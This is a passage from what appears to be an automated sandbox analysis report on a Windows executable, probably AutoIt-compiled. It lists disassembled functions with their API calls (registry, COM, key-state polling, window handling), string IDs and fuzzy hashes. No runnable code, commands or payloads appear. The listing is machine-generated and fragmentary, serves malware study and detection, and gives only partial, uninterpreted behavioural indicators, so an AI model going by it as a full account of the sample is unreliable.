                                                                                              • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                                                              • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                              • API String ID: 600699880-22481851
                                                                                              • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                              • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                                                              • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                              • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                                                              Function 00450C41 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: DestroyWindow
                                                                                              • String ID: static
                                                                                              • API String ID: 3375834691-2160076837
                                                                                              • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                              • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                                                              • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                              • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                                                              Function 0045D94B Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 88COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                                                              • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$DriveType
                                                                                              • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                                              • API String ID: 2907320926-3566645568
                                                                                              • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                              • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                                                              • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                              • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                                                              Function 00470928 Relevance: 16.7, APIs: 11, Instructions: 166windowtimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                              • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                                                              • DeleteObject.GDI32(00720000), ref: 00470A04
                                                                                              • DestroyIcon.USER32(005C0073), ref: 00470A1C
                                                                                              • DeleteObject.GDI32(AB991DDC), ref: 00470A34
                                                                                              • DestroyWindow.USER32(00450054), ref: 00470A4C
                                                                                              • DestroyIcon.USER32(?), ref: 00470A73
                                                                                              • DestroyIcon.USER32(?), ref: 00470A81
                                                                                              • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1237572874-0
                                                                                              • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                              • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                                                              • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                              • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                                                              Function 00479362 Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                                                              • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                                                              • VariantInit.OLEAUT32(?), ref: 004793E1
                                                                                              • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                                                              • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                                                              • VariantClear.OLEAUT32(?), ref: 00479489
                                                                                              • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                                                              • VariantClear.OLEAUT32(?), ref: 004794CA
                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                              • String ID:
                                                                                              • API String ID: 2706829360-0
                                                                                              • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                                              • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                                                              • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                                              • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                                                              Function 004447E0 Relevance: 16.6, APIs: 11, Instructions: 130keyboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetKeyboardState.USER32(?), ref: 0044480E
                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                                                              • GetKeyState.USER32(000000A0), ref: 004448AA
                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                                                              • GetKeyState.USER32(000000A1), ref: 004448D9
                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                                                              • GetKeyState.USER32(00000011), ref: 00444903
                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                                                              • GetKeyState.USER32(00000012), ref: 0044492D
                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                                                              • GetKeyState.USER32(0000005B), ref: 00444958
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: State$Async$Keyboard
                                                                                              • String ID:
                                                                                              • API String ID: 541375521-0
                                                                                              • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                              • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                                                              • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                              • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                                                              Function 00470B6C Relevance: 16.6, APIs: 11, Instructions: 125COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 3413494760-0
                                                                                              • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                                              • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                                                              • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                                              • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                                                              Function 004542ED Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 271libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                                              • String ID: AU3_FreeVar
                                                                                              • API String ID: 2634073740-771828931
                                                                                              • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                                              • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                                                              • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                                              • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                                                              Function 0046C5FA Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 208comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CoInitialize.OLE32 ref: 0046C63A
                                                                                              • CoUninitialize.OLE32 ref: 0046C645
                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                                                • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                                              • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                                              • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                                              • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                                              • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                              • API String ID: 2294789929-1287834457
                                                                                              • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                                              • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                                              • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                                              • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                                              Function 004710F1 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                                                • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                              • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                                              • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                                              • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                                              • ReleaseCapture.USER32 ref: 0047116F
                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                              • API String ID: 2483343779-2107944366
                                                                                              • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                                              • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                                              • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                                              • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                                              Function 004505F0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                                              • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                                              • _wcslen.LIBCMT ref: 00450720
                                                                                              • _wcscat.LIBCMT ref: 00450733
                                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                                              • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window_wcscat_wcslen
                                                                                              • String ID: -----$SysListView32
                                                                                              • API String ID: 4008455318-3975388722
                                                                                              • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                              • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                                              • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                              • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                                                              Function 00469BF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                              • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                                              • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                                              • GetParent.USER32 ref: 00469C98
                                                                                              • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                                              • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                                              • GetParent.USER32 ref: 00469CBC
                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 2360848162-1403004172
                                                                                              • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                              • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                                                              • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                              • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                                              Function 0045DC4C Relevance: 15.2, APIs: 10, Instructions: 190COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                                              • String ID:
                                                                                              • API String ID: 262282135-0
